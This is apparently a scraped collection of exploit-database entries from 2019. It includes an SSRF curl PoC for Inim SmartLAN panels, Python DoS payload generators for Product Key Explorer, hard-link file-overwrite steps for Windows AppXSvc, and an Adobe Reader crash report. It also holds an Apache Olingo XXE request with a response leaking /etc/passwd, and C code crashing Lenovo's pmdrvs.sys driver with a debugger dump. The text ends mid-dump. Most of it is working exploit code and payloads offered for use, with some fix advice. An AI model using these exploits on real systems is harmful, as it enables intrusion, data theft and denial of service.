ISHACK AI BOT

# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery # Author: LiquidWorm # Date: 2019-12-09 # Product web page: https://www.inim.biz # Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? # Version: 6.x # Advisory ID: ZSL-2019-5545 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF Vendor: INIM Electronics s.r.l. Product web page: https://www.inim.biz Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving? Affected version: <=6.x Affected models: SmartLiving 505 SmartLiving 515 SmartLiving 1050, SmartLiving 1050/G3 SmartLiving 10100L, SmartLiving10100L/G3 Summary: SmartLiving anti-intrusion control panel and security system provides important features rarely found in residential, commercial or industrial application systems of its kind. This optimized-performance control panel provides first-rate features such as: graphic display, text-to-speech, voice notifier, flexible hardware, end-to-end voice transmission (voice-on-bus), IP connectivity. SMARTLAN/SI: The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point networking capability and fast connectivity to the Internet. Therefore, it is possible to set up a remote connection and program or control the system via the SmartLeague software application. In effect, the SmartLAN/SI board grants the same level of access to the system as a local RS232 connection. SMARTLAN/G: The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides advanced remote-access and communication functions. The SmartLAN/G board is capable of sending event-related e-mails automatically. Each e-mail can be associated with a subject, an attachment and a text message. The attachment can be of any kind and is saved to an SD card. The message text can contain direct links to domains or IP addressable devices, such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users global access to their control panels via any Internet browser accessed through a PC, PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of distinguishing the means of connection and as a result provides an appropriate web-page for the tool in use. Smartphones can control the system in much the same way as a household keypad, from inside the house or from any part of the world. Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the SmartLiving SmartLAN within the GetImage functionality. The application parses user supplied data in the GET parameter 'host' to construct an image request to the service through onvif.cgi. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. Tested on: GNU/Linux 3.2.1 armv5tejl Boa/0.94.14rc21 BusyBox v1.20.2 Vulnerability discovered by Sipke Mellema @zeroscience Advisory ID: ZSL-2019-5545 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php PoC: curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2"

# Exploit Title: Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC) # Discovery by: SajjadBnd # Date: 2019-12-10 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Tested Version: 4.2.0.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 - Pro # [ About App ] # Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista, # Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more... # Visit "Features" page to see all supported software list of programs with which product key finder works. # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # Product key Explorer recovers product keys for software installed on your # local and network computers, allows track the number of software licenses installed in your business. # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money! # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv), # Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard. # [ POC ] # 1.Run the python script, it will create a new file "dos.txt" # 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" # 2.Paste the content of dos.txt into the Field: 'Name' # 6.click 'ok' # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 100 buffer += "\x42" * 100 buffer += "\x43" * 58 try: f = open("dos.txt","w") print "[+] Creating %s bytes DOS payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS) # Date: 2019-10-28 # Exploit Author: Gabor Seljan # Vendor Homepage: https://www.microsoft.com/ # Version: 17763.1.amd64fre.rs5_release.180914-1434 # Tested on: Windows 10 Version 1809 for x64-based Systems # CVE: CVE-2019-1476 # Summary: # AppXSvc improperly handles file hard links resulting in a low privileged user # being able to overwrite an arbitrary file leading to elevation of privilege. # Description: # An elevation of privilege vulnerability exists when the AppX Deployment Server # (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841 # originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced # to overwrite an arbitrary file by deleting all registry data files before # creating the file hard link. As Nabeel Ahmed described in his write-up of # CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with # the original settings.dat template. However, additional settings.dat.LOG1 and # settings.dat.LOG2 files are also created during the initialization process. # Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard # link allows a low privileged user to overwrite an arbitrary file with registry # data or just simply empty it, respectively. A low privileged user could exploit # this vulnerability to cause denial of service by overwriting critical system # files. Steps to reproduce: 1. Terminate Paint 3D processes. 2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder. 3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini. 4. Execute the start ms-paint: command to run Paint 3D. 5. Terminate Paint 3D processes. Expected result: It isn't possible to overwrite a file not writable by a low privileged user. Observed result: C:\Windows\win.ini file is overwritten with registry data. References: https://github.com/sgabe/CVE-2019-1476 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476 https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841

# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC) # Discovery by: SajjadBnd # Date: 2019-12-10 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Tested Version: 4.2.0.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 - Pro # [ About App ] # Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista, # Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more... # Visit "Features" page to see all supported software list of programs with which product key finder works. # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # Product key Explorer recovers product keys for software installed on your # local and network computers, allows track the number of software licenses installed in your business. # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money! # Product Key Finder | Best Product Key Finder Software # The Best Product Key Find and Recovery Software # You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv), # Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard. # [ POC ] # 1.Run the python script, it will create a new file "dos.txt" # 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" # 2.Paste the content of dos.txt into the Field: 'Key' # 6.click 'ok' # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 100 buffer += "\x42" * 100 buffer += "\x43" * 58 try: f = open("dos.txt","w") print "[+] Creating %s bytes DOS payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34 eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 CoolType!CTInit+0x3913e: 10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194 0:000> u @eip-14 CoolType!CTInit+0x3912a: 10e6c28a 8b7d0c mov edi,dword ptr [ebp+0Ch] 10e6c28d 8b571c mov edx,dword ptr [edi+1Ch] 10e6c290 8b7720 mov esi,dword ptr [edi+20h] 10e6c293 035508 add edx,dword ptr [ebp+8] 10e6c296 8b4724 mov eax,dword ptr [edi+24h] 10e6c299 037508 add esi,dword ptr [ebp+8] 10e6c29c 03c6 add eax,esi 10e6c29e 8902 mov dword ptr [edx],eax 0:000> ? poi(edi+1c) Evaluate expression: -690332 = fff57764 0:000> ? poi(ebp+8) Evaluate expression: 1887538240 = 70818c40 0:000> !heap -p -a 70818c40 address 70818c40 found in _DPH_HEAP_ROOT @ bfc1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 723d3b94: 70818c40 173c0 - 70818000 19000 unknown!fillpattern 0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240 77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c 77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6 77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 77e7ccee ntdll!RtlAllocateHeap+0x0000003e 0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 77c2f1f6 ucrtbase!_malloc_base+0x00000026 5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9 10e37991 CoolType!CTInit+0x00004831 10e38e1b CoolType!CTInit+0x00005cbb 10e68870 CoolType!CTInit+0x00035710 10e683dc CoolType!CTInit+0x0003527c 10e67d25 CoolType!CTInit+0x00034bc5 10e65902 CoolType!CTInit+0x000327a2 10e633f2 CoolType!CTInit+0x00030292 10e62719 CoolType!CTInit+0x0002f5b9 10e620e8 CoolType!CTInit+0x0002ef88 10e62000 CoolType!CTInit+0x0002eea0 108f36f1 AGM!AGMInitialize+0x0002a881 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e 01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82 02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6 03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87 04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef 05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750 06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99 07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac 08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292 09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9 0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88 0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0 0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881 0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce 0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197 0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c --- cut --- Notes: - The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability. - Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though). - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case). - Attached samples: poc[1-4].pdf (crashing files). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip

############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Apache Olingo OData 4.0 # Vendor: Apache Foundation # CSNC ID: CSNC-2009-025 # CVE ID: CVE-2019-17554 # Subject: XML External Entity Resolution (XXE) # Risk: High # Effect: Remotely exploitable # Author: Archibald Haddock ([email protected]) # Date: 08.11.2019 # ############################################################# Introduction: ------------- Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1] XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2]. Affected: --------- Vulnerable: * Olingo OData 4.x.x to 4.6.x Not vulnerable: * Olingo OData 4.7.0 * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01 Technical Description --------------------- The XML content type entity deserializer is not configured to deny the resolution of external entities. Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks. Request ====== POST /odata-server-sample/cars.svc/Cars HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8081/odata-server-sample/ Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0 Upgrade-Insecure-Requests: 1 content-type: application/xml Content-Length: 1101 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity"> <a:id>Cars(1)</a:id> <a:title></a:title> <a:summary></a:summary> <a:updated>2019-11-08T15:10:30Z</a:updated> <a:author> <a:name></a:name> </a:author> <a:link rel="edit" href="Cars(1)"></a:link> <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link> <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category> <a:content type="application/xml"> <m:properties> <d:Id m:type="Int16">1</d:Id> <d:Model>F1 &xxe;</d:Model> <d:ModelYear>2012</d:ModelYear> <d:Price m:type="Decimal">189189.43</d:Price> <d:Currency>EUR</d:Currency> </m:properties> </a:content> </a:entry> Response ======== HTTP/1.1 201 Created Server: Apache-Coyote/1.1 OData-Version: 4.0 Content-Type: application/xml Content-Length: 960 Date: Fri, 08 Nov 2019 14:22:35 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model> myuser:x:1000:1000:,,,:/home/myuser:/bin/bash </d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry> Workaround / Fix: ----------------- Configure the XML reader securely [3]. In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated: private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory(); The XMLInputFactory should be configured, not to resolve external entities: FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false); FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false); Timeline: --------- 2019-11-08: Discovery by Compass Security 2019-11-08: Initial vendor notification 2019-11-08: Initial vendor response 2019-12-04: Release of fixed Version / Patch [4] 2019-12-05: Coordinated public disclosure date [1] https://olingo.apache.org/ [2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing [3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html [4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt

# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC) # Date: 2019-12-11 # Exploit Author: Nassim Asrir # CVE: CVE-2019-6192 # Tested On: Windows 10(64bit) | ThinkPad T470p # Vendor : https://www.lenovo.com/us/en/ # Ref : https://support.lenovo.com/us/fr/solutions/len-29334 # Description # A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver # The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes # Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space. # Exploit #include <windows.h> #include <stdio.h> #include <conio.h> int main(int argc, char **argv) { HANDLE hDevice; DWORD bret; char szDevice[] = "\\\\.\\pmdrvs"; printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n"); printf("Opening handle to driver..\n"); if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) { printf("Device %s succesfully opened!\n", szDevice); printf("\tHandle: %p\n", hDevice); } else { printf("Error: Error opening device %s\n", szDevice); } printf("\nPress any key to DoS.."); _getch(); bret = 0; if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) { printf("DeviceIoControl Error - bytes returned %#x\n", bret); } CloseHandle(hDevice); return 0; } # RCA 2: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. FAULTING_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50) rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? Resetting default scope CPU_COUNT: 8 CPU_MHZ: af8 CPU_VENDOR: GenuineIntel CPU_FAMILY: 6 CPU_MODEL: 9e CPU_STEPPING: 9 CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init) BLACKBOXBSD: 1 (!blackboxbsd) BLACKBOXPNP: 1 (!blackboxpnp) CURRENT_IRQL: 0 ANALYSIS_SESSION_HOST: LAPTOP-SP ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485 ANALYSIS_VERSION: 10.0.17763.132 amd64fre LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d STACK_TEXT: ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060 ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59 ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071 ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56 ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925 00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844 THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b FOLLOWUP_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] FAULT_INSTR_CODE: 8941078b SYMBOL_STACK_INDEX: 0 FOLLOWUP_NAME: MachineOwner STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb BUGCHECK_STR: 2E8B5A19 EXCEPTION_CODE_STR: 2E8B5A19 EXCEPTION_STR: WRONG_SYMBOLS PROCESS_NAME: ntoskrnl.wrong.symbols.exe IMAGE_NAME: ntoskrnl.wrong.symbols.exe MODULE_NAME: nt_wrong_symbols SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000 BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000 TARGET_TIME: 2019-09-30T19:27:36.000Z OSBUILD: 17763 OSSERVICEPACK: 0 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 SUITE_MASK: 272 PRODUCT_TYPE: 1 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS OS_LOCALE: USER_LCID: 0 OSBUILD_TIMESTAMP: 1994-09-30 01:21:45 BUILDDATESTAMP_STR: 180914-1434 BUILDLAB_STR: rs5_release BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434 ANALYSIS_SESSION_ELAPSED_TIME: ae ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000 FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1} Followup: MachineOwner --------- 2: kd> u fffff804`28bf109d pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000) fffff804`28bf10a8 85c0 test eax,eax fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132) fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h] fffff804`28bf10b8 4885c9 test rcx,rcx fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132) 2: kd> !for_each_frame .frame /r @$Frame _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!KeBugCheckEx: fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7f09: fffff804`1f27a8e9 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x735c: fffff804`1f279d3c b801000000 mov eax,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!_chkstk+0x41f: fffff804`1f271b4f 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!RtlUnwindEx+0x3440: fffff804`1f1ca460 8bd0 mov edx,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000 rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 